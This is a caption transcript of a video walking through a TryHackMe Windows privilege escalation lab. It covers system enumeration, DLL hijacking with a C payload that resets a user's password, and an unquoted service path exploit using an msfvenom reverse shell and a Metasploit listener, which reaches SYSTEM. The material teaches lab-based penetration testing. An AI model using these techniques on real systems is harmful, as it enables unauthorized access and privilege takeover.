The Complete Windows Privilege Escalation Guide | TryHackMe Windows Privesc

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
what's going on welcome back today we will be going over the new pathway released by troy hackman junior penetration tester in this pathway you will go over all of the modules and you will gain the necessary knowledge to i'm not going to say to become a junior pen tester let me say to have the knowledge required to be a junior penetration tester so the module or the pathway consists of seven modules in every model you have a couple of rooms a couple of rooms so you have to complete all of the rooms in order to gain the certificate and of course there are prizes announced from trey hackme for those who complete as much rooms as possible from the pathway so i was curious to know what are the rooms contained in every module so i went over you see the first thing you have intro to pen testing you will cover the security and fantastic fundamentals next you will go over the application pen testing you will understand more about every kind of vulnerability encountered during web application pen testing including sql injection file inclusion either content discovery and then you will cover the basics of burp suite as you know if you want to do a pen testing you will definitely need to know how to work with burp suite next you will go over network security you will gain the knowledge and extensive knowledge actually to use nmap the later all different kinds of protocols and of course active and passive reconnaissance then vulnerability research you'll understand more what is vulnerability what kind of vulnerabilities and you will understand the methodology used to exploit vulnerabilities then you got made exploits and lastly privilege escalating for both windows and linux so that's the pathway and let me tell you something if you go to learn and then to oh yeah here are the learning paths so basically you have the fundamentals you have the offensive fantastic mentest plus complete beginner pro security cyber defense and junior print tester so basically want to know or how to know that junior pen tester is the right pathway for you so if you complete or if you have completed the complete beginner all right and if you have completed the pro security if you have completed both of these you can start pentest plus or you can start a junior pen tester if you are chasing the knowledge go after pentester if you are chasing the certificates and you want to prepare for your pentes plus you can take pentest plus and the last thing you want to do is to take the offensive and testing because the pen testing is more senior than pentastiplus or junior pentester some people may argue that those who take oscp or have the knowledge required to take oscp can be hired as junior pen testers so it doesn't matter the naming here basically the order the order follows like that you start with complete beginner and after complete beginner go over pro security after pro security go to web fundamentals first you can find the models you can have the option to start junior pen tester or com tia pentas plus up to and lastly we take the offensive fantastic if you are not into any of these and you're only into blue teaming you may start with complete beginner pro security web fundamentals and ignore these guys take the cyber defense anyway i'm not gonna make that long let's go back to juniper and tester and start with the first room the person that i would like to take today is windows privilege escalation so this room is interesting and it consists of eight tasks we will cover all of the tasks in today's video and of course i will be adding all of the notes to the existing note 5 of windows privileged escalation if you are not subscribed to the channel membership you can subscribe and take all of the notes i will be updating most of the notes today especially the windows privileged escalation one all right so no matter the introduction now let's start with the info gathering so start the machine and you have a couple of uh guide a couple of comments laid down here to help you do the privileged escalation so let's jump right into tasks and from here i will be starting the machine from the split view here windows wind preview enumeration and from here i will complete the tasks because there are no credentials in task 2 that you can use to log into the machine that's why i will be answering the questions and initialize the machine as you can see on the right so once we log into the machine this is our machine today let's go over the tasks and see how we can go over the required knowledge to do privilege escalation so first list users on the target system one of them resembles a flag so let's suppose that we have gained rdp access with the machine and we want to conduct the initial enumeration that will give us the knowledge to perform privileged escalation so we launch the command prompt make the phone bigger so my dear fans can see the font all right so now to list the c to list all of the users we type net users we can see all of the users on the system so we have administrator and we have thm17213 so the one that is asked is this one resembles a flag next one what is the os version of the target machine so he would ask to find the os version which means we need to find the system information so we type system info and now the all of the information about the system are being loaded so we will be presented with all of the necessary knowledge we need to answer the question so if you go up we have the host name windows server 2019 data center os version and this is the version so you copy that and answer with it now when was security when was security update kb 456 2562 and installed so here we have to list all of the updates installed on the system in order to find out the one being asked about so basically let me jump to my notes now and see search for updates so this is the command what we can do now we can type the command here and pipe the output to a command called find find string okay and between the strings let's copy the number of the updates so we type that and we hit enter so now we will list all of the updates and grab the one specified in the question so here it is it was installed on 6 10 2022 2020 what is the state of the windows defender now basically windows defender as you know it's a service runs it runs as a service in windows so in order to find out what is the state of windows defender we type sc query and the name of the service so basically you may ask what is the name of the windows defender service so i may have to list all of the services in order to understand which one is the windows defender so search for services so here we list all of the services let's take that um here and now i type find string as well inside i type let's say defender so we search all of the surfaces and grab the one that it has defender in its name or somewhere so we've got three fire windows defender firewall windows defender advanced threat protection windows defender antivirus network and the last one is windows defender anti-virus service the name is wind defend let's see the status of the service we type sc query when defend and it is stopped all right so why do we need to know all of this information so basically when you first conduct privilege escalation you want to gain information about the system among the useful information is the system version why because we somehow because sometimes some versions are vulnerable to certain vulnerabilities so we can then grab an appropriate exploit to nail that version we need to know how many users and who are they so we can decide which one of these users we want to take access to or gain access to the security updates when we list the security updates we can gain an insight on how many updates are uninstalled and how or you know how far the system is batched right lastly it's important of course to know the status of the windows defender service when you conduct privilege escalation in windows since windows defender is an antivirus service and it's important to know what kind of protections exist on the system before you transfer any exploit or any uh script so that is for this task next one tools of the trade no need to answer that but actually these are the tools automated tools that would help you uh beside manual methods in privileged escalation one of them is wimpy's most of you know that tool power up for from powershell and of course windows a gesture if you work on linux and lastly my display most of you know these tools right just you have to transfer the tool to the machine and run it so no need to answer any question in here next one variable software so here we have a couple of questions so in this task we want to know what are the softwares that installed and which one of these softwares could be vulnerable so we can find an appropriate export for that so in this task what version of a fitbit application can you see installed so here we want to see what are the uninstalled programs and softwares so let me go to my notes and see um search for software all right let's take that and list all of the softwares but to save time we're going use fine string to filter this command or the output of this command so double quotes and grab the name of the program it is fitbit now this command may take a while uh but you can just navigate through the file system and find the binary of the application uh program files x86 fitbit right click on that properties go to details and you will see the version but sometimes you don't have access uh we don't have rdp access or we don't have gui access to the system so you may need to accustom yourself to the command line anyway that's the version and it's going to come out after a while next one what kind of vulnerability seems to affect the fitbit application so if i go to my machine now and let me do search exploit fit bits so i have one vulnerability or one exploit the vulnerability is encoder service path so how do i know that this variability or this exploit matches the version of the application so i grab it with dash m search slot m i already do that so i'm gonna just ls and cat to exploit so here the details unquoted service path privileged escalation fitbit connect and installs a service with an encoded service path running with system privileges this could potentially allow an unauthorized but non-privileged local user to execute arbitrary code with elevated privilege on the system so here you see your query first the status of the service this auto start and here you know the uncoded path so you can create some executable and put it in one of these directories so basically we know now the vulnerability so we navigate back to our browser okay so here you see the version popped out all right so what kind of variability encoder service path what version of fox it reader is installed on a target system we do the same instead here we type boxet leader again through the same logic you go to this pc local disk program files nope 86 foxhet reader and right click properties nope details and here you got the version the same way you will see it coming out after a while through the command line now why do we need to know the versions of every application and installed on the system because as is as you seen a while uh a while ago that the fitbit application has or installed in a vulnerable version which means we can find and exploit for that version that's why you enumerate the softwares on the windows all right next one digital hijacking popular method to perform privileged escalation on windows okay now i'm going to skip right to the questions now for this task there is a different machine you will have the username and you will have the password and of course you can start the machine so in this task there's only one question to answer which is the flag so i'm going to explain the digital hijacking process while the machine is being run so let's go to my machine back and ls so naino hijack me so let's go over the c code here so this is a c code as you can see and the purpose of the c code is to execute a command the command in the c code is cmt.exe changed the password of the username jack to password11 so the c code can be now taken and converted into an actual dll now you can of course create a malicious dll using msf phenom but this is another way of doing the little hijack method so basically here we create a c file with these lines of code and of course we here we change the command according to our scenario in the scenario required we are asked to change the password of the user jack so we put the command as is here so next thing is we combine the c code into a dll file since we are working on linux and the dll file will be transferred to a windows system right we need to cross compile to cross compile the command is this one so we use a tool called mink w32 to cross compile the c code into a dll that would work on windows so i have already done that with this is a dll once you execute this command you will have the output as a file called hijack meter dll now we are ready to hijack or perform dll hijack attack but first before transferring the dehydrator to the machine we have to understand where to inject this payload let's first log into the machine this is romina by the way i expect you to know how to use this okay the the ip of the machine also connects and i'm gonna check mark the shared folder since i want to transfer files file system connect yes so make this bigger and this is our target machine for this task okay now we have already dll payload so where to put that payload first we have to find a service all right we have to find a service that is looking for a missing dll all right so we put our payload as the missing dll and then the service will use our dll so first let's enumerate the services and find a service that is looking for um i missed a missing payload so a missing dealer so services let me search for services and let's make the phone bigger so here are all exes sometimes you would have to look through the services first to find any service that is using a dll so for me it appears there is no by the way i'm just making this longer why i'm doing this let's download a program called process monitor through process monitor we can just do whatever we want let's see if i have it on my machine process i have process hacker so let me download process monitor on my machine technically you're gonna click on that download this to downloads okay and then we're gonna extract here extract here okay 64. i'm gonna grab this one copy it to kali machine so we're going to have to do that minimize this one like that and place or paste the press monitor here now we get back to the machine since we got sharing active we're gonna go to this pc and then to my kali machine go to home yeah kinda slow i know that so go to desktop i'm gonna go to try hack me and from here i can safely copy the executable file all right then so let's execute this agree so as you can see the windows defender has found ah so we have to have admin privileges okay so we can't do that we can't execute monitor on the machine so basically in this room since we cannot run process monitor for some reason because we don't have item privilege basically the owner of the room is telling you that you can use process monitor and they have already located a path for you to place your dll so basically in a regular scenario you run dll you run process monitor and you look for a service or a path that is looking for a dll which is not found in this scenario the path is what happened not permission to access this connection okay i think we have to go to our machine all right so the path is in the temp directory so if you go to temp now there is a service called let me just see if this is running search for dll so basically this is the service that they have located for you dllspc dll hijack service normally in a real scenario you have to locate the service yourself and find a service that is looking for a dll which is either missing or you have access to right over it so basically in this scenario they have already told you this is the service and you have to find out how to do dl hijacking on the servers so this service is using the temporary path and it's looking for a dll called hijack or dealer in this path or in the dim directory but as you can see the temp directory is empty so basically we have to take advantage of that and create one dll place it in that temp directory restart the service and see if we can uh if we if the command we created in the dll file will be executed so we go back to kali go to home desktop try hack me and then take this one copy that go to c temp and place it here now it goes back to the command line and see the status of the service sc query dll svc the server is stopped so we started now before doing that let's make sure the deal has been transferred enter and now we start the service i think i made a mistake it is query okay start deal svc now it is being started so let's wait for one minute and now we will try to log in with the other user which is jack so let's take minimize that that one and initialize a new connection take the ip address username is jack and the password we used was nano hijack let's see inside the file nope this is the password that we chose for this user auto connect now let's again now query the status of the service see if it has been started um dll svc start pending let's make sure from the so it is starting which means it's going to run let me try to log in now with the username we have just changed the password for connect and successfully we are logged in as a jack so which means the dll hijack has been successfully executed so now the question is asking log in with jack account what is the content of the flag dll text file so find the flag file there is one here in the recent files open it and this is your flag okay so that is for this task digital hijacking so next one is encoder service path which is also another method for conducting privilege escalation on windows so we close this machine we don't need this machine anymore yes keep the domino open so uncle the service path i'm going to explain the process any other questions let's now log into a new machine terminate this one and start this one all right so we take the ip address establish a new connection password1 and the username is user auto connect shared share my fire system and connect accept the certificate and now we are connecting so so there is an encoded service path vector in this or vulnerability in this machine we have to find it and we have to find out what is the service that is using or that is vulnerable to this vulnerability so basically maximize the view and open your command prompt up cmd so properties found okay so in order to find out which service has an encoded service path we have to enumerate the services right so we list all of the services display name the path name and we find out which one uses encoder service path all right so for all of the services that users that use executables on the system32 or in the windows directory we can't have access to these so you have to find out the non-standard ones one way to find out that is let's see here on my notes if there is a way to non-standard services okay this is one this one is good so these are the non-standard services as you can see we have amazon only amazon two now we have to remove the auto from here okay find let's remove the auto because we don't want it doesn't mean it doesn't necessarily have to be auto started the service so and yeah let's see now so now the list has been expanded and we've got program files in sequel registry you see it is coated this is the path which is coated next one is also coated this one is also coated coated and only one which is not coated is this one the path is in c program files uncoded path service common files unquotedpathservice.exe now and the name of the service is this one so the steps to conduct the privileged escalation on this vulnerability is to first know what is the status of the service so sc query and it is stopped as you can see now let's get more details about the service sc and now unquoted [Music] so i guess i made a mistake in the comment let's go up see where is the mistake so se server command the service name so these are the commands query query x i want to see the full path of the executable the server is using so i'm gonna have to retype but it doesn't display the full information about this let's go up and find the proper command for that can you see yeah it's qc so basically here instead of query i'm gonna type qc and now i can see the full executable path right as you can see it's not coded now the next step is to check if the uh one of the uh path here one of the directories can be or is writable to the current user so we need to know if we have permissions to write to one of these directories either program files either this one camel files so that we know where to place the payload and what to name it so for that i'm going to navigate to cd desktop okay let's move this to the right the system cannot find the path specified okay cd or dir the machine is lagging so cd now to see the desktop so i have the access check i will check on this path if i can right on this path program files so what i'm going to use now dot access check slash accept eula dash u w q and then between double quotes we type the path name no matching objects found access check 64. so accept the ula and i guess we forgot the directory again we've got this error c program wise yeah so actually actually i forget the backslash here one more time okay so basically on program files only administrators and system can write on this path so we cannot put our payload here let's go up and select the next path which is c program files unquoted service service path so the same command stands and of course we replace the path here with ours and as you can see we have users users among the users is the current one can write on this path which means now we can create our payload and place it on that path so now what's the name of the payload so basically the name of the payload should be since we replaced the payload here right the name should be common.exe so starting from this path right we can write on these directories which means we will create a payload name it command.exe and place it on this directory oh sorry on this directory so now let's switch to cali machine and yeah it's kelly machine actually let's minimize this one and go back to the terminal let me drive extract the command so basically we use msf venom right and the payload is windows 64 shell reverse tcp define your lhost define the listening port and the format of the file is exe and then the output name which is comma.txc now since i have already done this the file or the executable is ready next we launch the listener uh this is the handler all right i'm gonna launch a new tab here and type oh okay so the listener should be created on the msf console so launch msf cancel use multihandler i'm going to show you the options i created so you select the payload windows 64 reverse shell your l host your l board and run the listener navigate for the incoming connections switch back to the target machine and go to your or now we copy the file home select desktop try hack me and um go to so my file is somewhere here where is common come on come on oh my god where is the file let me check back so it's supposed to be here under try hack me okay let me create the file then it seems that i deleted the file without me knowing okay check back here refresh and now i should see the file i have just created common now i copy the file and we go to c program files unquoted service path and we place the file here now before going back to your listener and checking if the exploit worked let's first go to the comment line and start the service right we have to start our service go up let's find out where the service name i know this is overwhelming but that's how it works okay now sc query so now it's stopped let's start the service sc the service name or start and put the service name so now the service should be starting as you can see there isn't one new session open in my machine who am i and we are the net authority systems i have successfully conducted privileged escalation the answers what is the full encoded path of the service we explain this is the path go through some folders in the uncoded service binary path which folder does the user have read and write privilege we saw it was program files encoders path service what would be the name of the executable it was common now find the flag obtain administrator privileges on the targets what is the content of the flag since we know we don't know what is the flag file let's search for that file so we type let's go back cd back the full structure of the windows system type the ar the file name slash s and now it will search for the file once we locate the file we will extract the flag and we are done with the room now what else do we have to do in this room basically for the answers once you answer the questions here you are done but there are additional stuff to read if you are curious to know more about the windows privilege escalation methods no answer is easy here and here also no answer is needed but you can just read through these if you are subscribed to my channel you will find all of these notes summarized and briefed in the notify okay let me check on the file so we have found the file it is in c users cora documents nope anyway navigate to that path and read the content of the flag and you will find it is thm6 at the end of the line all right so that was for today and see you in the next video
Info
Channel: Motasem Hamdan
Views: 24,455
Rating: undefined out of 5
Keywords: windows, pentesting, arabaraar
Id: VlRox0GmOzU
Channel Id: undefined
Length: 41min 23sec (2483 seconds)
Published: Fri Oct 22 2021
Related Videos
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.